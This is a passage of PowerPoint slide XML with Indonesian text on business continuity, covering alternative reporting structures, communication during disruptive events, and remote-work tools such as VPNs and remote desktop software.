              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelangsungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Struktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pelaporan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Alternatif-Jelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hubungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaporan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sementara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengambilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keputusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertahankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengambilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keputusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>personil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>individu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sementara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peristiwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengganggu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Saluran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jelas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemangku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepentingan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>instruksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akurat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jelas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ekspektasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebingungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memfasilitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkoordinasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menumbuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepercayaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendorong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keterlibatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selaras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>respons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memainkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alternatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>struktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaporan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peristiwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengganggu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>pekerjaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Virtual Private Network (VPN)-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> internal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Lunak Desktop Jarak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Jauh-Memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
